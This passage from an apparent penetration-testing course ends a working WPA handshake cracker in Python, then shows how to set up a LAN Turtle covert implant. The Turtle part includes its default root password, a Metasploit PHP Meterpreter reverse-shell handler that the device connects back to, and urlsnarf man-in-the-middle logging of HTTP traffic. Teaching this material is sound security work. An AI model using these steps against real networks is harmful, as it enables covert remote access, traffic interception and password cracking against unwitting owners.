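                  handshake["anonce"], handshake["snonce"])
        if eapol_mic(key[:16], handshake["eapol"]) == handshake["mic"]:
            return candidate
    return None


def build_handshake(passphrase: str) -> dict:
    """Constructed message-2 data (not taken from a real capture) for an offline run."""
    spa = bytes.fromhex("00112233AABB")                        # made-up client MAC
    anonce, snonce = bytes(range(32)), bytes(range(32, 64))    # made-up nonces
    # Minimal EAPOL-Key message 2 body: descriptor type, key info, key length,
    # replay counter, SNonce, IV, RSC, ID, zeroed MIC, key data length.
    body = (b"\x02" + b"\x01\x0a" + b"\x00\x10" + b"\x00" * 7 + b"\x01" + snonce
            + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8 + b"\x00" * 16 + b"\x00\x00")
    eapol = b"\x02\x03" + len(body).to_bytes(2, "big") + body  # EAPOL v2, type EAPOL-Key
    kck = ptk(pmk(passphrase, SSID), BSSID, spa, anonce, snonce)[:16]
    mic = eapol_mic(kck, eapol)
    eapol = eapol[:MIC_OFFSET] + mic + eapol[MIC_OFFSET + 16:]  # frame as seen on air
    return {"ssid": SSID, "aa": BSSID, "spa": spa, "anonce": anonce,
            "snonce": snonce, "eapol": eapol, "mic": mic}


if __name__ == "__main__":
    handshake = build_handshake("testing123")
    print(crack(handshake, ["password", "letmein", "qwerty123", "testing123"]))
```

Because the cost is one PBKDF2 derivation per candidate and per SSID, tools precompute PMKs
for common SSIDs; that is also why an unusual SSID is a cheap defence against such tables,
though not against a targeted run like this one.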


Module 12: Other Attacks


LAN Turtle

The LAN Turtle is a covert systems administration and penetration testing tool providing
stealth remote access, network intelligence gathering and man-in-the-middle monitoring
capabilities. The LAN Turtle is exceptionally good at providing:

• Remote Access
• Network Intelligence
• Man-in-the-Middle

• USB Ethernet and Power
  o Enumerates on the host computer as a generic USB Ethernet device. The onboard
    Linux-based system uses this interface (eth0) to offer the host computer an IP
    address via DHCP.
• Covert Case
  o The generic USB Ethernet adapter case blends into the target network environment,
    allowing concealment behind desktops, in telephone closets and in server racks.
• Ethernet
  o Standard Ethernet port (eth1), set to obtain an IP address from the host LAN's DHCP
    server. If a host PC is connected to the USB (eth0) port, the Turtle bridges it
    through to the LAN, so the PC keeps its normal network access and has no reason to
    notice the device in between.
• Green Power Indicator LED
• Amber Status Indicator LED
• Reset Button (Inside Case)
  o Press to reset to the default configuration
  o Hold while powering on to access HTTP firmware recovery

First we need to configure the LAN Turtle. Connect it to your PC and wait 30 seconds. On
Windows, download PuTTY from:

http://www.chiark.greenend.org.uk/~sgtatham/putty/download.html

Start PuTTY and log in to the LAN Turtle over SSH. The IP is 172.16.84.1.

We use PuTTY because no SSH client is available on Windows by default; on Linux you can
simply run the ssh command in a terminal. Before connecting, change the translation in
PuTTY from UTF-8 to ISO-8859-1:1998 so that the Turtle's menu renders correctly.


Once you click Open you get a new window asking for credentials: the username is root and
the default password is sh3llz.

Change the default password straight away; the device will sit on someone's network, and a
known default password on it would be a gift to anyone else who finds it. After that the
configuration menu appears.

You can update the firmware via Config -> Check for updates. This requires an active internet
connection, so a LAN cable must be attached to the LAN Turtle.

The Turtle Shell:

The LAN Turtle is managed through the Turtle Shell, a text-based, menu-driven interface
accessible over SSH. The menus can be navigated with the standard arrow, tab, escape and
return keys, as well as the mouse in most terminals. The Turtle Shell's Configuration Menu
provides the ability to change advanced settings such as the password, MAC address and IP
address. Firmware updates may be checked for and installed as they become available.
By default the Turtle Shell starts at login via SSH unless disabled from the Configuration
Menu. Exiting the Turtle Shell returns the user to the LAN Turtle's bash shell. To return to
the Turtle Shell, run the "turtle" command.

Press Esc to drop to the command line, where you can run ordinary Linux commands.

To go back to the menu, type turtle.


Metasploit and LAN Turtle:

We can use the LAN Turtle to open a Meterpreter reverse shell back to a Metasploit handler.
The Turtle's Meterpreter module is a PHP payload, so the handler must use the PHP
Meterpreter. To set it up, start a Kali machine and check its IP address with the ifconfig
command.

Start msfconsole and create a handler:

root@kali:~# msfconsole
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD php/meterpreter/reverse_tcp
PAYLOAD => php/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 172.16.84.178
LHOST => 172.16.84.178
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > set EXITONSESSION false
EXITONSESSION => false
msf exploit(handler) > exploit -j

ExitOnSession false keeps the handler listening after the first session arrives, and -j runs
it as a background job so the console stays usable.

Now go to the LAN Turtle. Go to Modules -> Meterpreter.


Go to CONFIGURE and enter the IP address and port of the Kali machine the Turtle should
connect back to (the LHOST and LPORT set in the handler above).


Select Submit and then Start.

As soon as you start the module, a session opens on the Kali machine.


Now we can interact with the session using sessions -i 1 and run Meterpreter commands such
as sysinfo:

meterpreter > sysinfo

Computer    : turtle
OS          : Linux turtle 3.10.49 #9 Wed May 20 04:39:35 UTC 2015 mips
Meterpreter : php/php

Man in the Middle Attack:

The LAN Turtle can be used for man-in-the-middle attacks with a module named urlsnarf.
Because the Turtle bridges the host PC's USB connection (eth0) to the LAN port (eth1),
every packet the PC sends passes through it, and urlsnarf logs the HTTP requests it sees on
that path. To enable the module, log in to the LAN Turtle over SSH; this time we log in
from Kali Linux.

Go to Modules -> url-snarf.

Go to Configure.


Let's first test it. Select Test and browse to some website in your browser.

Looking at the Turtle interface, we can see the logged requests.


We can also save the logs to various locations.
